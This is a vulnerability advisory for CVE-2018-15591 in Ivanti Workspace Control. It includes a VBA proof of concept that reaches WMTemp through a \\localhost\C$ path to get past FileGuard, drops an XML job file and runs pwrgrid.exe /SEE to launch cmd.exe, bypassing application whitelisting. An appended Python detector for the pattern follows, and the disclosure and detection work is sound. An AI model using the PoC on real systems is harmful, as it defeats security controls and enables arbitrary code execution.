It was found that the PowerGrid application can be used to run arbitrary commands via the /SEE command line option. An attacker can abuse this issue to bypass Application Whitelisting in order to run arbitrary code on the target machine.
CVE-2018-15591
DOC-69684 - A locally authenticated user with low privileges can bypass Application Whitelisting by leveraging multiple unspecified attack vectors
DOC-69682 - Ivanti Workspace Control Files and Folders Security has been improved
This issue was successfully verified on Ivanti Workspace Control version 10.2.950.0.
This issue is mitigated in Ivanti Workspace Control version 10.3.0.0. The fix included in this version prevents the creation of XML files within the WMTemp folder, effectively preventing this issue from being exploited.
Ivanti Workspace Control (formerly known as RES ONE Workspace) is a User Environment Management solution. It contains a number of security features, one of which is Application Whitelisting. Application Whitelisting can be used to only allow approved applications to execute. Whitelisting can be configured in various ways; in Workspace Control a commonly used method is to whitelist based on path. As of Workspace Control version 10.1 it is also possible to whitelist based on signing certificate.
By design a number of Workspace Control executables are exempted from Application Whitelisting. One of these applications is the PowerGrid application (pwrgrid.exe). It was found that it is possible to use PowerGrid to run any arbitrary application by using the /SEE command line argument. In order to do so the attacker needs to abuse another vulnerability in Workspace Control. When successfully exploited, this allows the attacker to bypass Application Whitelisting.
Workspace Control creates a temporary folder WMTemp under the logged-on user's AppData folder. This folder is protected by the FileGuard Minifilter driver, meaning that the logged-on user is not allowed to create or modify files within this folder. Some Workspace Control applications will create XML files in this folder, which is allowed by FileGuard. These XML files contain commands that need to be started by PowerGrid. After the XML file is created, PowerGrid is invoked with the /SEE command line argument and the file name of the XML file that needs to be processed. PowerGrid will load the file from the WMTemp folder and run the command as configured in the XML file.
Normally, FileGuard will prevent the execution of arbitrary commands, because the user can't create any new files within the WMTemp folder. By abusing another vulnerability in Workspace Control it is possible to bypass FileGuard and create XML files within the WMTemp folder. By doing so it is possible for an attacker to bypass Application Whitelisting in order to run arbitrary commands.
Proof of concept
The VBA code below demonstrates this issue. The code tries to run cmd.exe using the /SEE command line argument.
Private Declare PtrSafe Function GetCurrentProcessId Lib "kernel32.dll" () As Integer
Private Declare PtrSafe Function ProcessIdToSessionId Lib "kernel32.dll" (ByVal dwProcessId As Integer, ByRef pSessionId As Integer) As Integer

Private Sub PowerGridAWLBypass()
    On Error Resume Next

    ' WMTemp is located in a per-session folder, so look up the session ID of the current process
    Dim SessionID As Integer
    Dim appDataPath, resPath
    If ProcessIdToSessionId(GetCurrentProcessId, SessionID) = 0 Then
        SessionID = 1
    End If

    ' Paths: the user's local AppData folder and the Workspace Control installation folder (RESPFDIR)
    appDataPath = Replace(UCase(Environ("LOCALAPPDATA")), "C:", "\\localhost\C$")
    resPath = Environ("RESPFDIR")

    ' Write the XML file that PowerGrid will process into the WMTemp folder
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(appDataPath & "\RES\WM\" & SessionID & "\WMTemp\foo.xml")
    oFile.WriteLine "<foo><file>cmd.exe</file><showcmd>5</showcmd></foo>"
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing

    ' Invoke PowerGrid with the /SEE argument and the name of the XML file
    Shell resPath & "\pwrgrid.exe /SEE foo.xml", vbNormalFocus
End Sub
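As an added example for defenders, not part of the advisory or of Ivanti's own tooling: a small Python script that runs two detection heuristics over constructed process-creation and file-creation records, flagging pwrgrid.exe /SEE invocations whose parent process lies outside the Workspace Control installation folder and XML files written into WMTemp by processes outside that folder. The installation folder value, the wmagent.exe component name and the sample events are assumptions; the script assumes legitimate PowerGrid invocations originate from Workspace Control's own components, as the advisory describes.

```python
import re
from pathlib import PureWindowsPath

# Constructed placeholder for the folder RESPFDIR points to on the host;
# on a real system read the actual value of that environment variable.
INSTALL_DIR = r"C:\Program Files\WorkspaceControl"

# WMTemp lives under %LOCALAPPDATA%\RES\WM\<session id>\WMTemp (per the advisory).
# Not anchored at the start, so a path written in \\localhost\C$\... form also matches.
WMTEMP_XML = re.compile(r"\\RES\\WM\\\d+\\WMTemp\\[^\\]+\.xml$", re.IGNORECASE)
SEE_FLAG = re.compile(r"(^|\s)/SEE(\s|$)", re.IGNORECASE)

def under_install_dir(image):
    """True if an image path lies inside the Workspace Control installation folder."""
    try:
        PureWindowsPath(image.lower()).relative_to(PureWindowsPath(INSTALL_DIR.lower()))
        return True
    except ValueError:
        return False

def analyse(events):
    """Return (reason, event) pairs for events that match either heuristic."""
    findings = []
    for ev in events:
        if ev["type"] == "process_create":
            if (PureWindowsPath(ev["image"]).name.lower() == "pwrgrid.exe"
                    and SEE_FLAG.search(ev["cmdline"])
                    and not under_install_dir(ev["parent_image"])):
                findings.append(("pwrgrid.exe /SEE started by a parent outside Workspace Control", ev))
        elif ev["type"] == "file_create":
            if WMTEMP_XML.search(ev["target"]) and not under_install_dir(ev["image"]):
                findings.append(("XML file written to WMTemp by a process outside Workspace Control", ev))
    return findings

# Constructed sample telemetry (simplified process-create / file-create records, not real logs).
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    # Benign: a Workspace Control component (hypothetical wmagent.exe) writes a job file, then runs PowerGrid.
    {"type": "file_create", "image": INSTALL_DIR + r"\wmagent.exe",
     "target": r"C:\Users\alice\AppData\Local\RES\WM\1\WMTemp\job.xml"},
    {"type": "process_create", "image": INSTALL_DIR + r"\pwrgrid.exe",
     "cmdline": "pwrgrid.exe /SEE job.xml", "parent_image": INSTALL_DIR + r"\wmagent.exe"},
    # Pattern of the advisory's PoC: an Office macro writes the job file, then runs PowerGrid.
    {"type": "file_create", "image": OFFICE,
     "target": r"C:\Users\alice\AppData\Local\RES\WM\1\WMTemp\foo.xml"},
    {"type": "process_create", "image": INSTALL_DIR + r"\pwrgrid.exe",
     "cmdline": "pwrgrid.exe /SEE foo.xml", "parent_image": OFFICE},
]
```

Running analyse(SAMPLE_EVENTS) yields two findings, both for the Office-originated pair; the benign pair produces none.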